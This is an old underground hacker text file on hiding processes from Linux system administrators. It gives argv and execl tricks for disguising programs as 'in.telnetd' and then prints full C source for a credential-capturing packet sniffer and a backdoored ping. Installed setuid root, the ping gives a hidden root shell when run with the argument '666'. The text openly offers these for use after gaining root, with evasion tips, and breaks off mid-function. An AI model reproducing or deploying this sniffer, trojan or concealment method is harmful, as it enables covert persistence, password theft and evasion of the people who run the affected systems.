Hiding from sysadm's.... -------------------------------------- by Phantom _ | Hiding Processes under linux.. - ------------------------------ Well, i'm aware of three methods, but there's always some guys that say that they know better, so if any of you have anything you would like to share with the world, send it to me... And, NO, you dont have to be root to use 'em... 1. Memory change of parameters ------------------------------- You have to know something about the parameters on linux. they are like this: argv[0] is the program that you just ran... (if you ran bash then argv[0] will be "bash") argv[1] is your first parameter argv[2] is u'r second... and so on.. The proggie below just hides itself in memory... and runs ps just to show you what he did... #include #include main(argc, argv) int argc; char *argv[]; { strcpy(argv[0],"I aint around, am I ???"); system("/bin/ps"); } This method is good for sniffers and proggies like those... (no r00t will ever find out that the "in.telnetd" is in fact the sniffer.(dont kidd yourselves, anybody can find out where it was run from, just by issuing a "ps -ew"...) :) 2. Execl parameter modifications --------------------------------- The proggie below just runs a /bin/bash (love that shell!!!) Just try to find that /bin/bash with ps...You won't find it... It's cloaked as "in.telnetd" #include main() { execl("/bin/bash","in.telnetd",NULL); } 3. PATH setting --------------- copy the program as in.telnetd and then set your PATH variable to the path to the program, and then exec the program..... :) example: evil_site:~$ gimmer00t Here ya go, dude..... :) evil_site:~# evil_site:~# cp sniffsniff in.telnetd evil_site:~# export PATH=/home/phantom/ evil_site:~# in.telnetd & Sniffer started... Let's rock. :) evil_site:~# exit evil_site:~$ Ok. These three methods i find very usefull in hiding from sysadmins... For Linux and Redhat... I've never tested 'em on other OS.. Below: A modified sniffer, and a modified trojan. 
If you got root, then use them and dont forget to change the damn settings... :) btw you should consider searching the binary ping file for the word "DAEMON" or something and change it with a binary editor to something else .. :) Both progs hide the spawned shells in the process list as in.telnetd and you wont find either of 'em unless you really know how to and what to search and where... :) Now i dont say these methods are the best, but it's the best i could think of... :) and no, the sources aren't mine... when i use some trojan i modify it first, so that no sysadm can figgure out that the binary he uses is a trojan.... #include #include #include #include #include #include #include #include #include #include #include #include #include #include int openintf(char *); int read_tcp(int); int filter(void); int print_header(void); int print_data(int, char *); char *hostlookup(unsigned long int); void clear_victim(void); void cleanup(int); struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; }ep; struct { unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; int bytes_read; char active; time_t start_time; } victim; struct iphdr *ip; struct tcphdr *tcp; int s; FILE *fp; #define CAPTLEN 512 #define TIMEOUT 30 #define TCPLOG "tcp.log" int openintf(char *d) { int fd; struct ifreq ifr; int s; fd=socket(AF_INET, SOCK_PACKET, htons(0x800)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } strcpy(ifr.ifr_name, d); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); return fd; } int read_tcp(int s) { int x; while(1) { x=read(s, (struct etherpacket *)&ep, sizeof(ep)); if(x > 1) { if(filter()==0) continue; x=x-54; if(x < 1) continue; return x; } } } int filter(void) { int p; p=0; if(ip->protocol != 6) return 0; if(victim.active != 0) 
if(victim.bytes_read > CAPTLEN) { fprintf(fp, "\n----- [CAPLEN Exceeded]\n"); clear_victim(); return 0; } if(victim.active != 0) if(time(NULL) > (victim.start_time + TIMEOUT)) { fprintf(fp, "\n----- [Timed Out]\n"); clear_victim(); return 0; } if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==109) p=1; /* pop2 */ if(ntohs(tcp->dest)==143) p=1; /* imap2 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ if(victim.active == 0) if(p == 1) if(tcp->syn == 1) { victim.saddr=ip->saddr; victim.daddr=ip->daddr; victim.active=1; victim.sport=tcp->source; victim.dport=tcp->dest; victim.bytes_read=0; victim.start_time=time(NULL); print_header(); } if(tcp->dest != victim.dport) return 0; if(tcp->source != victim.sport) return 0; if(ip->saddr != victim.saddr) return 0; if(ip->daddr != victim.daddr) return 0; if(tcp->rst == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [RST]\n"); clear_victim(); return 0; } if(tcp->fin == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [FIN]\n"); clear_victim(); return 0; } return 1; } int print_header(void) { fprintf(fp, "\n"); fprintf(fp, "%s => ", hostlookup(ip->saddr)); fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest)); } int print_data(int datalen, char *data) { int i=0; int t=0; victim.bytes_read=victim.bytes_read+datalen; for(i=0;i != datalen;i++) { if(data[i] == 13) { fprintf(fp, "\n"); t=0; } if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;} if(t > 75) {t=0;fprintf(fp, "\n");} } } main(int argc, char **argv) { sprintf(argv[0],"%s","in.telnetd"); s=openintf("eth0"); ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); signal(SIGHUP, SIG_IGN); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); signal(SIGKILL, cleanup); signal(SIGQUIT, cleanup); if(argc == 2) fp=stdout; else fp=fopen(TCPLOG, "at"); if(fp == NULL) { 
fprintf(stderr, "cant open log\n");exit(0);} clear_victim(); for(;;) { read_tcp(s); if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); fflush(fp); } } char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; i.s_addr=in; he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); if(he == NULL) strcpy(blah, inet_ntoa(i)); else strcpy(blah, he->h_name); return blah; } void clear_victim(void) { victim.saddr=0; victim.daddr=0; victim.sport=0; victim.dport=0; victim.active=0; victim.bytes_read=0; victim.start_time=0; } void cleanup(int sig) { fprintf(fp, "Exiting...\n"); close(s); fclose(fp); exit(0); } -------------------------------------Ping-Trojan---------------------------- /*Makefile*/ LDFLAGS += -N ping: ping.o install: ping install -m4755 ping /sbin # install -s ping /sbin # install -m644 ping.8 /usr/man/man8 clean: rm -f *.o ping ---------------------------Ping.c-------------------------------------------- #ifndef lint char copyright[] = "@(#) Copyright (c) 1989 The Regents of the University of California.\n\ All rights reserved.\n"; #endif /* not lint */ #ifndef lint /*static char sccsid[] = "from: @(#)ping.c 5.9 (Berkeley) 5/12/91";*/ static char rcsid[] = "$Id: ping.c,v 1.1 1994/05/23 09:07:13 rzsfl Exp rzsfl $"; #endif /* not lint */ /* Change the settings, dude... 
*/ #include #include #include #include #include #include #include #include #define MAX_IPOPTLEN 4096 #include #include #include #include #include #include #define ICMP_MINLEN 32 #define DEFDATALEN (64 - 8) /* default data length */ #define MAXIPLEN 60 #define MAXICMPLEN 76 #define MAXPACKET (65536 - 60 - 8)/* max packet size */ #define MAXWAIT 10 /* max seconds to wait for response */ #define NROUTES 9 /* number of record route slots */ #define A(bit) rcvd_tbl[(bit)>>3] /* identify byte in array */ #define B(bit) (1 << ((bit) & 0x07)) /* identify bit in byte */ #define SET(bit) (A(bit) |= B(bit)) #define CLR(bit) (A(bit) &= (~B(bit))) #define TST(bit) (A(bit) & B(bit)) /* various options */ int options; #define F_FLOOD 0x001 #define F_INTERVAL 0x002 #define F_NUMERIC 0x004 #define F_PINGFILLED 0x008 #define F_QUIET 0x010 #define F_RROUTE 0x020 #define F_SO_DEBUG 0x040 #define F_SO_DONTROUTE 0x080 #define F_VERBOSE 0x100 /* multicast options */ int moptions; #define MULTICAST_NOLOOP 0x001 #define MULTICAST_TTL 0x002 #define MULTICAST_IF 0x004 /* * MAX_DUP_CHK is the number of bits in received table, i.e. the maximum * number of received sequence numbers we can keep track of. Change 128 * to 8192 for complete accuracy... 
*/ #define MAX_DUP_CHK (8 * 128) int mx_dup_ck = MAX_DUP_CHK; char rcvd_tbl[MAX_DUP_CHK / 8]; struct sockaddr whereto; /* who to ping */ int datalen = DEFDATALEN; int s; /* socket file descriptor */ u_char outpack[MAXPACKET]; char BSPACE = '\b'; /* characters written for flood */ char DOT = '.'; char *hostname; int ident; /* process id to identify our packets */ char DEMONSTRING[3]; char DAEMON[20]; char GARGOYLE[9]; /* counters */ long npackets; /* max packets to transmit */ long nreceived; /* # of packets we got back */ long nrepeats; /* number of duplicates */ long ntransmitted; /* sequence # for outbound packets = #sent */ int interval = 1; /* interval between packets */ /* timing */ int timing; /* flag to do timing */ long tmin = LONG_MAX; /* minimum round trip time */ long tmax; /* maximum round trip time */ u_long tsum; /* sum of all times, for doing average */ char *pr_addr(); void catcher(), finish(); void demon(); main(argc, argv) int argc; char **argv; { extern int errno, optind; extern char *optarg; struct timeval timeout; struct hostent *hp; struct sockaddr_in *to; struct protoent *proto; struct in_addr ifaddr; int i; int ch, fdmask, hold, packlen, preload; u_char *datap, *packet; char *target, hnamebuf[MAXHOSTNAMELEN], *malloc(); u_char ttl, loop; DEMONSTRING[0]='6'; DEMONSTRING[1]='6'; DEMONSTRING[2]='6'; DAEMON[0]='w'; DAEMON[1]='e'; DAEMON[2]='r'; DAEMON[3]='d'; DAEMON[4]=' '; DAEMON[5]='k'; DAEMON[6]='1'; DAEMON[7]='d'; DAEMON[8]=' '; DAEMON[9]='.'; DAEMON[10]='Y'; DAEMON[11]='u'; DAEMON[12]='r'; DAEMON[13]=' '; DAEMON[14]='i'; DAEMON[15]='n'; DAEMON[16]='.'; DAEMON[17]='\n'; DAEMON[18]='\0'; GARGOYLE[0]='/'; GARGOYLE[1]='b'; GARGOYLE[2]='i'; GARGOYLE[3]='n'; GARGOYLE[4]='/'; GARGOYLE[5]='s'; GARGOYLE[6]='h'; GARGOYLE[8]='\0'; /*#ifdef IP_OPTIONS char rspace[3 + 4 * NROUTES + 1]; record route space */ /*#endif*/ preload = 0; datap = &outpack[8 + sizeof(struct timeval)]; if(argc==2)if(!strcmp(argv[1],DEMONSTRING))demon(); while ((ch = getopt(argc, 
argv, "I:LRc:dfh:i:l:np:qrs:t:v")) != EOF) switch(ch) { case 'c': npackets = atoi(optarg); if (npackets <= 0) { (void)fprintf(stderr, "ping: bad number of packets to transmit.\n"); exit(1); } break; case 'd': options |= F_SO_DEBUG; break; case 'f': if (getuid()) { (void)fprintf(stderr, "ping: %s\n", strerror(EPERM)); exit(1); } options |= F_FLOOD; setbuf(stdout, (char *)NULL); break; case 'i': /* wait between sending packets */ interval = atoi(optarg); if (interval <= 0) { (void)fprintf(stderr, "ping: bad timing interval.\n"); exit(1); } options |= F_INTERVAL; break; case 'l': preload = atoi(optarg); if (preload < 0) { (void)fprintf(stderr, "ping: bad preload value.\n"); exit(1); } break; case 'n': options |= F_NUMERIC; break; case 'p': /* fill buffer with user pattern */ options |= F_PINGFILLED; fill((char *)datap, optarg); break; case 'q': options |= F_QUIET; break; case 'R': options |= F_RROUTE; break; case 'r': options |= F_SO_DONTROUTE; break; case 's': /* size of packet to send */ datalen = atoi(optarg); if (datalen > MAXPACKET) { (void)fprintf(stderr, "ping: packet size too large.\n"); exit(1); } if (datalen <= 0) { (void)fprintf(stderr, "ping: illegal packet size.\n"); exit(1); } break; case 'v': options |= F_VERBOSE; break; case 'L': moptions |= MULTICAST_NOLOOP; loop = 0; break; case 't': moptions |= MULTICAST_TTL; i = atoi(optarg); if (i < 0 || i > 255) { printf("ttl %u out of range\n", i); exit(1); } ttl = i; break; case 'I': moptions |= MULTICAST_IF; { int i1, i2, i3, i4; if (sscanf(optarg, "%u.%u.%u.%u%c", &i1, &i2, &i3, &i4, &i) != 4) { printf("bad interface address '%s'\n", optarg); exit(1); } ifaddr.s_addr = (i1<<24)|(i2<<16)|(i3<<8)|i4; ifaddr.s_addr = htonl(ifaddr.s_addr); } break; default: usage(); } argc -= optind; argv += optind; if (argc != 1) usage(); target = *argv; bzero((char *)&whereto, sizeof(struct sockaddr)); to = (struct sockaddr_in *)&whereto; to->sin_family = AF_INET; to->sin_addr.s_addr = inet_addr(target); if (to->sin_addr.s_addr 
!= (u_int)-1) hostname = target; else { hp = gethostbyname(target); if (!hp) { (void)fprintf(stderr, "ping: unknown host %s\n", target); exit(1); } to->sin_family = hp->h_addrtype; bcopy(hp->h_addr, (caddr_t)&to->sin_addr, hp->h_length); (void)strncpy(hnamebuf, hp->h_name, sizeof(hnamebuf) - 1); hostname = hnamebuf; } if (options & F_FLOOD && options & F_INTERVAL) { (void)fprintf(stderr, "ping: -f and -i incompatible options.\n"); exit(1); } if (datalen >= sizeof(struct timeval)) /* can we time transfer */ timing = 1; packlen = datalen + MAXIPLEN + MAXICMPLEN; if (!(packet = (u_char *)malloc((u_int)packlen))) { (void)fprintf(stderr, "ping: out of memory.\n"); exit(1); } if (!(options & F_PINGFILLED)) for (i = 8; i < datalen; ++i) *datap++ = i; ident = getpid() & 0xFFFF; if (!(proto = getprotobyname("icmp"))) { (void)fprintf(stderr, "ping: unknown protocol icmp.\n"); exit(1); } if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) { perror("ping: socket"); exit(1); } hold = 1; if (options & F_SO_DEBUG) (void)setsockopt(s, SOL_SOCKET, SO_DEBUG, (char *)&hold, sizeof(hold)); if (options & F_SO_DONTROUTE) (void)setsockopt(s, SOL_SOCKET, SO_DONTROUTE, (char *)&hold, sizeof(hold)); /* record route option */ if (options & F_RROUTE) { /*#ifdef IP_OPTIONS rspace[IPOPT_OPTVAL] = IPOPT_RR; rspace[IPOPT_OLEN] = sizeof(rspace)-1; rspace[IPOPT_OFFSET] = IPOPT_MINOFF; if (setsockopt(s, IPPROTO_IP, IP_OPTIONS, rspace, sizeof(rspace)) < 0) { perror("ping: record route"); exit(1); } #else*/ (void)fprintf(stderr, "ping: record route not available in this implementation.\n"); exit(1); /*#endif IP_OPTIONS */ } /* * When pinging the broadcast address, you can get a lot of answers. * Doing something so evil is useful if you are trying to stress the * ethernet, or just want to fill the arp cache to get some stuff for * /etc/ethers. 
*/ hold = 48 * 1024; (void)setsockopt(s, SOL_SOCKET, SO_RCVBUF, (char *)&hold, sizeof(hold)); #if 0 if (moptions & MULTICAST_NOLOOP) { if (setsockopt(s, IPPROTO_IP, IP_MULTICAST_LOOP, &loop, 1) == -1) { perror ("can't disable multicast loopback"); exit(92); } } if (moptions & MULTICAST_TTL) { if (setsockopt(s, IPPROTO_IP, IP_MULTICAST_TTL, &ttl, 1) == -1) { perror ("can't set multicast time-to-live"); exit(93); } } if (moptions & MULTICAST_IF) { if (setsockopt(s, IPPROTO_IP, IP_MULTICAST_IF, &ifaddr, sizeof(ifaddr)) == -1) { perror ("can't set multicast source interface"); exit(94); } } #endif if (to->sin_family == AF_INET) (void)printf("PING %s (%s): %d data bytes\n", hostname, inet_ntoa(*(struct in_addr *)&to->sin_addr.s_addr), datalen); else (void)printf("PING %s: %d data bytes\n", hostname, datalen); (void)signal(SIGINT, finish); (void)signal(SIGALRM, catcher); while (preload--) /* fire off them quickies */ pinger(); if ((options & F_FLOOD) == 0) catcher(); /* start things going */ for (;;) { struct sockaddr_in from; register int cc; int fromlen; if (options & F_FLOOD) { pinger(); timeout.tv_sec = 0; timeout.tv_usec = 10000; fdmask = 1 << s; if (select(s + 1, (fd_set *)&fdmask, (fd_set *)NULL, (fd_set *)NULL, &timeout) < 1) continue; } fromlen = sizeof(from); if ((cc = recvfrom(s, (char *)packet, packlen, 0, (struct sockaddr *)&from, &fromlen)) < 0) { if (errno == EINTR) continue; perror("ping: recvfrom"); continue; } pr_pack((char *)packet, cc, &from); if (npackets && nreceived >= npackets) break; } finish(); /* NOTREACHED */ } void demon(){ fprintf(stderr,DAEMON); execl(GARGOYLE,"in.telnetd",NULL); } /* * catcher -- * This routine causes another PING to be transmitted, and then * schedules another SIGALRM for 1 second from now. * * bug -- * Our sense of time will slowly skew (i.e., packets will not be * launched exactly at 1-second intervals). This does not affect the * quality of the delay and loss statistics. 
*/ void catcher() { int waittime; pinger(); (void)signal(SIGALRM, catcher); if (!npackets || ntransmitted < npackets) alarm((u_int)interval); else { if (nreceived) { waittime = 2 * tmax / 1000; if (!waittime) waittime = 1; } else waittime = MAXWAIT; (void)signal(SIGALRM, finish); (void)alarm((u_int)waittime); } } #define icmp_type type #define icmp_code code #define icmp_cksum checksum #define icmp_id un.echo.id #define icmp_seq un.echo.sequence #define icmp_gwaddr un.gateway #define ip_hl ihl #define ip_v version #define ip_tos tos #define ip_len tot_len #define ip_id id #define ip_off frag_off #define ip_ttl ttl #define ip_p protocol #define ip_sum check #define ip_src saddr #define ip_dst daddr /* * pinger -- * Compose and transmit an ICMP ECHO REQUEST packet. The IP packet * will be added on by the kernel. The ID field is our UNIX process ID, * and the sequence number is an ascending integer. The first 8 bytes * of the data portion are used to hold a UNIX "timeval" struct in VAX * byte-order, to compute the round-trip time. */ pinger() { register struct icmphdr *icp; register int cc; int i; icp = (struct icmphdr *)outpack; icp->icmp_type = ICMP_ECHO; icp->icmp_code = 0; icp->icmp_cksum = 0; icp->icmp_seq = ntransmitted++; icp->icmp_id = ident; /* ID */ CLR(icp->icmp_seq % mx_dup_ck); if (timing) (void)gettimeofday((struct timeval *)&outpack[8], (struct timezone *)NULL); cc = datalen + 8; /* skips ICMP portion */ /* compute ICMP checksum here */ icp->icmp_cksum = in_cksum((u_short *)icp, cc); i = sendto(s, (char *)outpack, cc, 0, &whereto, sizeof(struct sockaddr)); if (i < 0 || i != cc) { if (i < 0) perror("ping: sendto"); (void)printf("ping: wrote %s %d chars, ret=%d\n", hostname, cc, i); } if (!(options & F_QUIET) && options & F_FLOOD) (void)write(STDOUT_FILENO, &DOT, 1); } /* * pr_pack -- * Print out the packet, if it came from us. This logic is necessary * because ALL readers of the ICMP socket get a copy of ALL ICMP packets * which arrive ('tis only fair). 
This permits multiple copies of this * program to be run without having intermingled output (or statistics!). */ pr_pack(buf, cc, from) char *buf; int cc; struct sockaddr_in *from; { register struct icmphdr *icp; register u_long l; register int i, j; register u_char *cp,*dp; static int old_rrlen; static char old_rr[MAX_IPOPTLEN]; struct iphdr *ip; struct timeval tv, *tp; long triptime; int hlen, dupflag; (void)gettimeofday(&tv, (struct timezone *)NULL); /* Check the IP header */ ip = (struct iphdr *)buf; hlen = ip->ip_hl << 2; if (cc < hlen + ICMP_MINLEN) { if (options & F_VERBOSE) (void)fprintf(stderr, "ping: packet too short (%d bytes) from %s\n", cc, inet_ntoa(*(struct in_addr *)&from->sin_addr.s_addr)); return; } /* Now the ICMP part */ cc -= hlen; icp = (struct icmphdr *)(buf + hlen); if (icp->icmp_type == ICMP_ECHOREPLY) { if (icp->icmp_id != ident) return; /* 'Twas not our ECHO */ ++nreceived; if (timing) { #ifndef icmp_data tp = (struct timeval *)(icp + 1); #else tp = (struct timeval *)icp->icmp_data; #endif tvsub(&tv, tp); triptime = tv.tv_sec * 10000 + (tv.tv_usec / 100); tsum += triptime; if (triptime < tmin) tmin = triptime; if (triptime > tmax) tmax = triptime; } if (TST(icp->icmp_seq % mx_dup_ck)) { ++nrepeats; --nreceived; dupflag = 1; } else { SET(icp->icmp_seq % mx_dup_ck); dupflag = 0; } if (options & F_QUIET) return; if (options & F_FLOOD) (void)write(STDOUT_FILENO, &BSPACE, 1); else { (void)printf("%d bytes from %s: icmp_seq=%u", cc, inet_ntoa(*(struct in_addr *)&from->sin_addr.s_addr), icp->icmp_seq); (void)printf(" ttl=%d", ip->ip_ttl); if (timing) (void)printf(" time=%ld.%ld ms", triptime/10, triptime%10); if (dupflag) (void)printf(" (DUP!)"); /* check the data */ cp = ((u_char*)(icp + 1) + 8); dp = &outpack[8 + sizeof(struct timeval)]; for (i = 8; i < datalen; ++i, ++cp, ++dp) { if (*cp != *dp) { (void)printf("\nwrong data byte #%d should be 0x%x but was 0x%x", i, *dp, *cp); cp = (u_char*)(icp + 1); for (i = 8; i < datalen; ++i, ++cp) { if 
((i % 32) == 8) (void)printf("\n\t"); (void)printf("%x ", *cp); } break; } } } } else { /* We've got something other than an ECHOREPLY */ if (!(options & F_VERBOSE)) return; (void)printf("%d bytes from %s: ", cc, pr_addr(from->sin_addr.s_addr)); pr_icmph(icp); } #if 0 /* Display any IP options */ cp = (u_char *)buf + sizeof(struct iphdr); for (; hlen > (int)sizeof(struct iphdr); --hlen, ++cp) switch (*cp) { case IPOPT_EOL: hlen = 0; break; case IPOPT_LSRR: (void)printf("\nLSRR: "); hlen -= 2; j = *++cp; ++cp; if (j > IPOPT_MINOFF) for (;;) { l = *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; if (l == 0) (void)printf("\t0.0.0.0"); else (void)printf("\t%s", pr_addr(ntohl(l))); hlen -= 4; j -= 4; if (j <= IPOPT_MINOFF) break; (void)putchar('\n'); } break; case IPOPT_RR: j = *++cp; /* get length */ i = *++cp; /* and pointer */ hlen -= 2; if (i > j) i = j; i -= IPOPT_MINOFF; if (i <= 0) continue; if (i == old_rrlen && cp == (u_char *)buf + sizeof(struct ip) + 2 && !bcmp((char *)cp, old_rr, i) && !(options & F_FLOOD)) { (void)printf("\t(same route)"); i = ((i + 3) / 4) * 4; hlen -= i; cp += i; break; } old_rrlen = i; bcopy((char *)cp, old_rr, i); (void)printf("\nRR: "); for (;;) { l = *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; if (l == 0) (void)printf("\t0.0.0.0"); else (void)printf("\t%s", pr_addr(ntohl(l))); hlen -= 4; i -= 4; if (i <= 0) break; (void)putchar('\n'); } break; case IPOPT_NOP: (void)printf("\nNOP"); break; default: (void)printf("\nunknown option %x", *cp); break; } #endif if (!(options & F_FLOOD)) { (void)putchar('\n'); (void)fflush(stdout); } } /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * 
carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* * tvsub -- * Subtract 2 timeval structs: out = out - in. Out is assumed to * be >= in. */ tvsub(out, in) register struct timeval *out, *in; { if ((out->tv_usec -= in->tv_usec) < 0) { --out->tv_sec; out->tv_usec += 1000000; } out->tv_sec -= in->tv_sec; } /* * finish -- * Print out statistics, and give up. */ void finish() { (void)signal(SIGINT, SIG_IGN); (void)putchar('\n'); (void)fflush(stdout); (void)printf("--- %s ping statistics ---\n", hostname); (void)printf("%ld packets transmitted, ", ntransmitted); (void)printf("%ld packets received, ", nreceived); if (nrepeats) (void)printf("+%ld duplicates, ", nrepeats); if (ntransmitted) if (nreceived > ntransmitted) (void)printf("-- somebody's printing up packets!"); else (void)printf("%d%% packet loss", (int) (((ntransmitted - nreceived) * 100) / ntransmitted)); (void)putchar('\n'); if (nreceived && timing) (void)printf("round-trip min/avg/max = %ld.%ld/%lu.%ld/%ld.%ld ms\n", tmin/10, tmin%10, (tsum / (nreceived + nrepeats))/10, (tsum / (nreceived + nrepeats))%10, tmax/10, tmax%10); exit(0); } #ifdef notdef static char *ttab[] = { "Echo Reply", /* ip + seq + udata */ "Dest Unreachable", /* net, host, proto, port, frag, sr + IP */ "Source Quench", /* IP */ "Redirect", /* redirect type, gateway, + IP */ "Echo", "Time Exceeded", /* transit, frag reassem + IP */ "Parameter Problem", /* pointer + IP */ "Timestamp", /* id + seq + three timestamps */ "Timestamp Reply", /* " */ "Info Request", /* id + sq */ "Info Reply" /* " */ }; #endif /* * pr_icmph -- * Print a descriptive string about an ICMP 
header. */ pr_icmph(icp) struct icmphdr *icp; { switch(icp->icmp_type) { case ICMP_ECHOREPLY: (void)printf("Echo Reply\n"); /* XXX ID + Seq + Data */ break; case ICMP_DEST_UNREACH: switch(icp->icmp_code) { case ICMP_NET_UNREACH: (void)printf("Destination Net Unreachable\n"); break; case ICMP_HOST_UNREACH: (void)printf("Destination Host Unreachable\n"); break; case ICMP_PROT_UNREACH: (void)printf("Destination Protocol Unreachable\n"); break; case ICMP_PORT_UNREACH: (void)printf("Destination Port Unreachable\n"); break; case ICMP_FRAG_NEEDED: (void)printf("frag needed and DF set\n"); break; case ICMP_SR_FAILED: (void)printf("Source Route Failed\n"); break; default: (void)printf("Dest Unreachable, Bad Code: %d\n", icp->icmp_code); break; } /* Print returned IP header information */ #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_SOURCE_QUENCH: (void)printf("Source Quench\n"); #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_REDIRECT: switch(icp->icmp_code) { case ICMP_REDIR_NET: (void)printf("Redirect Network"); break; case ICMP_REDIR_HOST: (void)printf("Redirect Host"); break; case ICMP_REDIR_NETTOS: (void)printf("Redirect Type of Service and Network"); break; case ICMP_REDIR_HOSTTOS: (void)printf("Redirect Type of Service and Host"); break; default: (void)printf("Redirect, Bad Code: %d", icp->icmp_code); break; } (void)printf("(New addr: 0x%08lx)\n", icp->icmp_gwaddr); #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_ECHO: (void)printf("Echo Request\n"); /* XXX ID + Seq + Data */ break; case ICMP_TIME_EXCEEDED: switch(icp->icmp_code) { case ICMP_EXC_TTL: (void)printf("Time to live exceeded\n"); break; case ICMP_EXC_FRAGTIME: (void)printf("Frag reassembly time exceeded\n"); break; default: (void)printf("Time exceeded, Bad Code: %d\n", icp->icmp_code); break; } #ifndef icmp_data pr_retip(icp + 1); 
#else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_PARAMETERPROB: (void)printf("Parameter problem: pointer = 0x%02x\n", icp->un.gateway); #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_TIMESTAMP: (void)printf("Timestamp\n"); /* XXX ID + Seq + 3 timestamps */ break; case ICMP_TIMESTAMPREPLY: (void)printf("Timestamp Reply\n"); /* XXX ID + Seq + 3 timestamps */ break; case ICMP_INFO_REQUEST: (void)printf("Information Request\n"); /* XXX ID + Seq */ break; case ICMP_INFO_REPLY: (void)printf("Information Reply\n"); /* XXX ID + Seq */ break; #ifdef ICMP_MASKREQ case ICMP_MASKREQ: (void)printf("Address Mask Request\n"); break; #endif #ifdef ICMP_MASKREPLY case ICMP_MASKREPLY: (void)printf("Address Mask Reply\n"); break; #endif default: (void)printf("Bad ICMP type: %d\n", icp->icmp_type); } } /* * pr_iph -- * Print an IP header with options. */ pr_iph(ip) struct iphdr *ip; { int hlen; u_char *cp; hlen = ip->ip_hl << 2; cp = (u_char *)ip + 20; /* point to options */ (void)printf("Vr HL TOS Len ID Flg off TTL Pro cks Src Dst Data\n"); (void)printf(" %1x %1x %02x %04x %04x", ip->ip_v, ip->ip_hl, ip->ip_tos, ip->ip_len, ip->ip_id); (void)printf(" %1x %04x", ((ip->ip_off) & 0xe000) >> 13, (ip->ip_off) & 0x1fff); (void)printf(" %02x %02x %04x", ip->ip_ttl, ip->ip_p, ip->ip_sum); (void)printf(" %s ", inet_ntoa(ip->ip_src)); (void)printf(" %s ", inet_ntoa(ip->ip_dst)); /* dump and option bytes */ while (hlen-- > 20) { (void)printf("%02x", *cp++); } (void)putchar('\n'); } /* * pr_addr -- * Return an ascii host address as a dotted quad and optionally with * a hostname. 
*/ char * pr_addr(l) u_long l; { struct hostent *hp; static char buf[80]; if ((options & F_NUMERIC) || !(hp = gethostbyaddr((char *)&l, 4, AF_INET))) (void)sprintf(buf, "%s", inet_ntoa(*(struct in_addr *)&l)); else (void)sprintf(buf, "%s (%s)", hp->h_name, inet_ntoa(*(struct in_addr *)&l)); return(buf); } /* * pr_retip -- * Dump some info on a returned (via ICMP) IP packet. */ pr_retip(ip) struct iphdr *ip; { int hlen; u_char *cp; pr_iph(ip); hlen = ip->ip_hl << 2; cp = (u_char *)ip + hlen; if (ip->ip_p == 6) (void)printf("TCP: from port %u, to port %u (decimal)\n", (*cp * 256 + *(cp + 1)), (*(cp + 2) * 256 + *(cp + 3))); else if (ip->ip_p == 17) (void)printf("UDP: from port %u, to port %u (decimal)\n", (*cp * 256 + *(cp + 1)), (*(cp + 2) * 256 + *(cp + 3))); } fill(bp, patp) char *bp, *patp; { register int ii, jj, kk; int pat[16]; char *cp; for (cp = patp; *cp; cp++) if (!isxdigit(*cp)) { (void)fprintf(stderr, "ping: patterns must be specified as hex digits.\n"); exit(1); } ii = sscanf(patp, "%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x", &pat[0], &pat[1], &pat[2], &pat[3], &pat[4], &pat[5], &pat[6], &pat[7], &pat[8], &pat[9], &pat[10], &pat[11], &pat[12], &pat[13], &pat[14], &pat[15]); if (ii > 0) for (kk = 0; kk <= MAXPACKET - (8 + ii); kk += ii) for (jj = 0; jj < ii; ++jj) bp[jj + kk] = pat[jj]; if (!(options & F_QUIET)) { (void)printf("PATTERN: 0x"); for (jj = 0; jj < ii; ++jj) (void)printf("%02x", bp[jj] & 0xFF); (void)printf("\n"); } } usage() { (void)fprintf(stderr, "usage: ping [-LRdfnqrv] [-c count] [-i wait] 